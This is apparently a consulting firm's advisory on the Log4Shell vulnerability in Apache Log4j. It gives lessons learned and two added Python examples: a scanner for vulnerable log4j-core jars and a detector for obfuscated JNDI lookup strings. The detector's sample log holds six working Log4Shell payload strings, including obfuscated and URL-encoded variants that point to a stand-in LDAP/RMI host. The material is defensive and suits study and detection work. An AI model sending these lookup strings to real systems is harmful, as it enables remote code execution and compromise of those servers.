Article | December 15, 2021

Things to consider in the wake of the Log4Shell vulnerability


CVE-2021-44228, better known as Log4Shell, is a critical, actively exploited vulnerability in the Apache Log4j 2 logging library: an unauthenticated attacker who can get a crafted string (a JNDI lookup such as ${jndi:ldap://...}) into any field that the application logs can execute code on that system. It was publicly disclosed on December 9, 2021, it affects businesses and individuals alike, and it requires immediate action. IT teams have been working since then to find every exposed system and either upgrade Log4j to a fixed release or apply mitigations that remove the attacker's ability to trigger the lookup.

Looking past the immediate response to the post-mortem, here are a few practices that would have helped with this event and that would mitigate similar ones in the future:

  • Complete and accurate software inventory – A current inventory of deployed software, including the third-party libraries each application bundles (a software bill of materials), would have let organizations triage this vulnerability quickly and accurately. Log4j is one of many shared libraries embedded in enterprise and vendor products, often nested inside application archives where a package listing never sees it. Many teams spent the first days simply trying to find out whether they were affected; an inventory kept up to date before the event answers that question in hours rather than days.
  • Network segmentation – Properly segmenting the network, including the use of a demilitarized zone (DMZ) for internet-facing hosts, is crucial to containing the impact of a compromised host. It matters twice here: an exploited Log4Shell host has to make an outbound LDAP or RMI connection to the attacker's server to fetch its payload, so servers that are not allowed to initiate connections to the internet are far harder to exploit, and a compromised host that has unrestricted access from the DMZ into the internal network lets the attacker move laterally across the organization instead of being contained.
  • Web Application Firewall – The Log4Shell attack path, a lookup string carried in any request field that ends up being logged (including headers such as User-Agent), is the kind of traffic a Web Application Firewall can inspect and block. Two caveats: the WAF must terminate or otherwise decrypt TLS (the successor to SSL) to see the request at all, and attackers began obfuscating the string with nested lookups within hours of disclosure, so a WAF rule is a stopgap that buys time to patch, not a fix.
  • Decommissioning of legacy systems – Shutting down legacy systems and closing unnecessary ports reduces the organization's attack surface. Systems that no longer have a business need tend to be forgotten, stay unpatched, and are exactly the ones nobody thought to check for Log4j. Such systems should be shut down.
  • Incident response planning – Preparing for an incident, including a formalized plan that is tested and rehearsed, is an important first step. Scrambling to address issues while they are happening is chaotic and ineffective.
  • System and application threat modeling – In-depth threat modeling, including consideration of supply chain attacks through the libraries an application depends on, should be part of the System/Software Development Lifecycle. Evaluating risk in depth helps an organization understand its attack surface and limit the impact of an attack.
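
The inventory point above is concrete enough to show in code. The following is an added example, not code from the original article or from Elliott Davis: a small scanner that walks a directory, opens every .jar/.war/.ear/.zip it finds, recurses into nested archives (where application servers bundle log4j-core), reads the Maven pom.properties that log4j-core ships with, and also flags JndiLookup.class when no version metadata exists (shaded or renamed jars). The sample archives it scans are constructed inside the script and are not real Log4j artifacts; the affected range it checks (log4j-core 2.0-beta9 up to and including 2.14.1) is the one in the Apache advisory for CVE-2021-44228.

```python
"""Added example: inventory scan for log4j-core, including jars nested inside archives."""
import io
import os
import tempfile
import zipfile

ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"


def parse_version(version):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0). Non-numeric parts are dropped."""
    return tuple(int(p) for p in version.split("-")[0].split(".") if p.isdigit())


def is_vulnerable_to_44228(version):
    """True when log4j-core is in the CVE-2021-44228 range (2.0-beta9 <= v < 2.15.0)."""
    return (2, 0) <= parse_version(version) < (2, 15, 0)


def inspect_archive(data, path):
    """Inspect one archive held in memory and recurse into nested archives.

    Returns one finding per log4j-core (or bare JndiLookup.class) occurrence."""
    findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings  # not actually a zip; nothing to inspect
    names = set(zf.namelist())
    version = None
    if POM_PROPS in names:
        for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                version = line.split("=", 1)[1].strip()
    has_jndi = JNDI_LOOKUP in names
    if version is not None or has_jndi:
        findings.append({
            "path": path,
            "version": version,  # None means shaded/renamed jar: review by hand
            "jndi_lookup_present": has_jndi,
            "vulnerable_to_44228": is_vulnerable_to_44228(version) if version else None,
        })
    for name in sorted(names):
        if name.lower().endswith(ARCHIVE_SUFFIXES):  # jar inside war/ear/uber-jar
            findings.extend(inspect_archive(zf.read(name), path + "!/" + name))
    return findings


def scan_tree(root):
    """Scan every archive under root and return all findings."""
    findings = []
    for dirpath, _dirs, filenames in os.walk(root):
        for fn in sorted(filenames):
            if fn.lower().endswith(ARCHIVE_SUFFIXES):
                full = os.path.join(dirpath, fn)
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                with open(full, "rb") as fh:
                    findings.extend(inspect_archive(fh.read(), rel))
    return findings


def _make_archive(entries):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


def build_sample_tree(root):
    """Write constructed sample archives (not real Log4j artifacts) into root."""
    class_stub = b"\xca\xfe\xba\xbe"  # placeholder bytes standing in for a class file
    vuln_core = _make_archive({POM_PROPS: "version=2.14.1\nartifactId=log4j-core\n",
                               JNDI_LOOKUP: class_stub})
    fixed_core = _make_archive({POM_PROPS: "version=2.17.1\nartifactId=log4j-core\n",
                                JNDI_LOOKUP: class_stub})
    shaded_app = _make_archive({"com/example/App.class": class_stub, JNDI_LOOKUP: class_stub})
    legacy_war = _make_archive({"WEB-INF/web.xml": "<web-app/>",
                                "WEB-INF/lib/log4j-core-2.14.1.jar": vuln_core})
    for fn, data in [("legacy.war", legacy_war), ("log4j-core-2.17.1.jar", fixed_core),
                     ("shaded-app.jar", shaded_app)]:
        with open(os.path.join(root, fn), "wb") as fh:
            fh.write(data)


def demo():
    """Build the sample tree in a temp dir, scan it, and return the findings."""
    root = tempfile.mkdtemp(prefix="log4j-scan-")
    build_sample_tree(root)
    return scan_tree(root)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Run against a real application directory with scan_tree("/opt/apps") (path is an assumption). The point of the nested-archive recursion is the "legacy.war" case: a file listing of the server shows no log4j jar at all, yet the scanner reports log4j-core 2.14.1 inside WEB-INF/lib. The shaded-app case is the other trap an inventory must handle: no version metadata, but the vulnerable class is present, so it goes to a human for review rather than being silently marked clean.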

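The WAF caveat above (attackers obfuscate the lookup string) is worth seeing in working code, because it is the difference between a rule that catches the first wave and one that catches the next. The following is an added example, not code from the original article or from any WAF vendor: it normalizes the common Log4Shell obfuscations (URL encoding, ${lower:x}/${upper:x}, and the ${prefix:key:-default} form where a failed lookup yields the attacker-chosen default) before matching, and runs both the naive and the normalized check over constructed web-server log lines. The log lines and the 198.51.100.7 address are made up for the example (198.51.100.7 is a documentation address).

```python
"""Added example: detecting obfuscated Log4Shell lookup strings in requests or logs."""
import re
from urllib.parse import unquote

# Innermost ${...} with no nested lookup inside it; resolved first, like Log4j does.
LOOKUP = re.compile(r"\$\{([^${}]*)\}")


def _resolve(match):
    body = match.group(1)
    low = body.lower()
    if low.startswith("jndi:"):
        return match.group(0)             # this is the lookup we want to surface; keep it
    if low.startswith("lower:"):
        return body[len("lower:"):].lower()
    if low.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:                      # ${prefix:key:-default}: a failed lookup yields default
        return body.split(":-", 1)[1]
    return match.group(0)                 # unknown lookup (date, sys, ...): left unresolved


def normalize(text, max_rounds=20):
    """Undo URL encoding and resolve nested lookups from the inside out."""
    text = unquote(unquote(text))         # single and double URL encoding
    for _ in range(max_rounds):
        new = LOOKUP.sub(_resolve, text)
        if new == text:
            break
        text = new
    return text


def naive_match(line):
    """The first-day rule: literal, case-sensitive substring match."""
    return "${jndi:" in line


def classify(line):
    norm = normalize(line).lower()
    if "${jndi:" in norm:
        return "jndi"                     # block / alert
    if "${" in norm:
        return "lookup"                   # unresolved lookup syntax: not proven hostile, review
    return "clean"


def find_hits(lines):
    hits = []
    for i, line in enumerate(lines):
        verdict = classify(line)
        if verdict != "clean":
            hits.append((i, verdict))
    return hits


# Constructed access-log lines (combined format with User-Agent), not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:03:11:09 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [10/Dec/2021:03:11:10 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.5 - - [10/Dec/2021:03:11:11 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://198.51.100.7:1389/a}"',
    '10.0.0.5 - - [10/Dec/2021:03:11:12 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:ldap://198.51.100.7:1389/a}"',
    '10.0.0.5 - - [10/Dec/2021:03:11:13 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:NaN:-j}ndi:rmi://198.51.100.7:1099/a}"',
    '10.0.0.5 - - [10/Dec/2021:03:11:14 +0000] "GET / HTTP/1.1" 200 512 "-" "${JNDI:LDAP://198.51.100.7:1389/a}"',
    '10.0.0.5 - - [10/Dec/2021:03:11:15 +0000] "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%3A1389%2Fa%7D HTTP/1.1" 200 512 "-" "curl/7.79"',
    '10.0.0.5 - - [10/Dec/2021:03:11:16 +0000] "GET /search?q=${price} HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for i, line in enumerate(SAMPLE_LOG):
        print(i, "naive=%s" % naive_match(line), "normalized=%s" % classify(line))
```

Of the six hostile lines, the naive rule matches exactly one; the normalized check catches all six and routes the harmless ${price} template to review instead of blocking it. The design choice to note is that _resolve leaves lookups it does not understand in place rather than guessing, so the "lookup" verdict is where new evasions will surface first. That is also the limit of the approach: Log4j has many more lookup types than are modelled here, which is why a WAF rule is a stopgap and the library upgrade is the fix.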
If your organization needs assistance with this issue or with planning for the next event, please do not hesitate to contact the Elliott Davis Cyber Team.

The information provided in this communication is of a general nature and should not be considered professional advice.  You should not act upon the information provided without obtaining specific professional advice. The information above is subject to change.

“Elliott Davis” is the brand name under which Elliott Davis, LLC (doing business in North Carolina and D.C. as Elliott Davis, PLLC) and Elliott Davis Advisory, LLC and its subsidiary entities provide professional services. Elliott Davis, LLC and Elliott Davis Advisory, LLC and its subsidiary entities practice as an alternative practice structure in accordance with the AICPA Code of Professional Conduct and applicable law, regulations and professional standards. Elliott Davis, LLC is a licensed independent CPA firm that provides attest services to its customers. Elliott Davis Advisory, LLC and its subsidiary entities provide tax and business consulting services to their customers. Elliott Davis Advisory, LLC and its subsidiary entities are not licensed CPA firms. The entities falling under the Elliott Davis brand are each individual firms that are separate legal and independently owned entities and are not responsible or liable for the services and/or products provided by any other entity providing services and/or products under the Elliott Davis brand. Our use of the terms “our firm” and “we” and “us” and terms of similar import, denote the alternative practice structure conducted by Elliott Davis, LLC and Elliott Davis Advisory, LLC.
